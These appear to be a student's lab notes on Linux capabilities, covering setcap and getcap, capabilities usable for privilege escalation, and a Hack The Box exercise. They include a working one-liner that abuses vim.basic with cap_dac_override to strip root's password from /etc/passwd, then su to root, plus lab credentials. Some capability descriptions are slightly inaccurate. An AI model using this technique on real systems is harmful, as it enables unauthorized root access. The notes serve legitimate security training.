# Intro - Linux capabilities are a security feature in the Linux operating system that allows specific privs to be granted to processes, allowing them to perform specific actions that would otherwise be restricted - This allows fine-grained control over which processes have access to certain privs, making it more secure than the traditional Unix model of granting privileges to users and groups # Set Capability - Setting capabilities involves using the appropriate tools and commands to assign specific capabilities to executables or programs - In Ubuntu, for example, we can use the `setcap` command to set capabilities for specific executables - This command allows us to specify the capability we want to set and the value we want to assign. - Below are some examples of values that we can use with the `setcap` command, along with a brief description of what they do | **Capability Values** | **Description** | | --------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `=` | This value sets the specified capability for the executable, but does not grant any privileges. This can be useful if we want to clear a previously set capability for the executable. | | `+ep` | This value grants the effective and permitted privileges for the specified capability to the executable. This allows the executable to perform the actions that the capability allows but does not allow it to perform any actions that are not allowed by the capability. | | `+ei` | This value grants sufficient and inheritable privileges for the specified capability to the executable. This allows the executable to perform the actions that the capability allows and child processes spawned by the executable to inherit the capability and perform the same actions. | | `+p` | This value grants the permitted privileges for the specified capability to the executable. This allows the executable to perform the actions that the capability allows but does not allow it to perform any actions that are not allowed by the capability. This can be useful if we want to grant the capability to the executable but prevent it from inheriting the capability or allowing child processes to inherit it. | # Example with `cap_net_bind_service` - For example, we could use the following command to set the `cap_net_bind_service` capability for an executable: ```bash sudo setcap cap_net_bind_service=+ep /usr/bin/vim.basic ``` - When capabilities are set for a binary, it means that the binary will be able to perform specific actions that it would not be able to perform without the capabilities - In this example, if the `cap_net_bind_service` capability is set for a binary, the binary will be able to bind to network ports, which is a privilege usually restricted. - Some capabilities, such as `cap_sys_admin`, allows an executable to perform actions with admin privs, can be dangerous if they are not used properly - Below are some common capabilities: |**Capability**|**Description**| |---|---| |`cap_sys_admin`|Allows to perform actions with administrative privileges, such as modifying system files or changing system settings.| |`cap_sys_chroot`|Allows to change the root directory for the current process, allowing it to access files and directories that would otherwise be inaccessible.| |`cap_sys_ptrace`|Allows to attach to and debug other processes, potentially allowing it to gain access to sensitive information or modify the behavior of other processes.| |`cap_sys_nice`|Allows to raise or lower the priority of processes, potentially allowing it to gain access to resources that would otherwise be restricted.| |`cap_sys_time`|Allows to modify the system clock, potentially allowing it to manipulate timestamps or cause other processes to behave in unexpected ways.| |`cap_sys_resource`|Allows to modify system resource limits, such as the maximum number of open file descriptors or the maximum amount of memory that can be allocated.| |`cap_sys_module`|Allows to load and unload kernel modules, potentially allowing it to modify the operating system's behavior or gain access to sensitive information.| |`cap_net_bind_service`|Allows to bind to network ports, potentially allowing it to gain access to sensitive information or perform unauthorized actions.| ## Capabilities for Privesc - Several Linux capabilities can be used to escalate a user's privileges to `root`, including: |**Capability**|**Description**| |---|---| |`cap_setuid`|Allows a process to set its effective user ID, which can be used to gain the privileges of another user, including the `root` user.| |`cap_setgid`|Allows to set its effective group ID, which can be used to gain the privileges of another group, including the `root` group.| |`cap_sys_admin`|This capability provides a broad range of administrative privileges, including the ability to perform many actions reserved for the `root` user, such as modifying system settings and mounting and unmounting file systems.| |`cap_dac_override`|Allows bypassing of file read, write, and execute permission checks.| # Capabilities Enum - Capabilities should be used with caution and only granted to trusted processes, as they can be misused to gain unauthorized access to the system. - To enumerate all existing capabilities for all existing binary executables on a Linux system, we can use the following command: ```bash find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; ``` # Capabilities Exploitation - For example, assume we gained access to a system with a low-privilege account, then discovered the `cap_dac_override` capability based on the below enum command of the target bin ```bash getcap /usr/bin/vim.basic /usr/bin/vim.basic cap_dac_override=eip ``` - In this example, the `/usr/bin/vim.basic` binary is run without special privileges, such as with `sudo` - However, because the binary has the `cap_dac_override` capability set, it can escalate the privileges of the user who runs it - This would allow a pentester to gain the `cap_dac_override` capability and perform tasks that require this capability - With this in mind, let's take a look at the `/etc/passwd` file where the user `root` is specified ```bash cat /etc/passwd | head -n1 root:x:0:0:root:/root:/bin/bash ``` - Next, let's use the `cap_dac_override` capability of the `/usr/bin/vim` binary to modify a system file such as `/etc/passwd` in a non-interactive mode ```bash echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd cat /etc/passwd | head -n1 root::0:0:root:/root:/bin/bash ``` - Now, the `x` is gone, which means that we can use the command `su` to log in as root without being asked for the password --- # Exercise - `ping` test ![[images/Pasted image 20260204203125.png]] - `nmap` scans ![[images/Pasted image 20260204203232.png]] - `ssh` into box with given creds `htb-student:HTB_@cademy_stdnt!` - light enum on box ![[images/Pasted image 20260204203241.png]] - enum caps ![[images/Pasted image 20260204203337.png]] - confirm against `vim.basic` with `getcap` ![[images/Pasted image 20260204203430.png]] - review `/etc/passwd` ![[images/Pasted image 20260204203454.png]] - modify `/etc/passwd` with the cap associated with `vim.basic` and confirm modification ![[images/Pasted image 20260204203601.png]] - use `su` command without password and navigate to flag![[images/Pasted image 20260204203650.png]]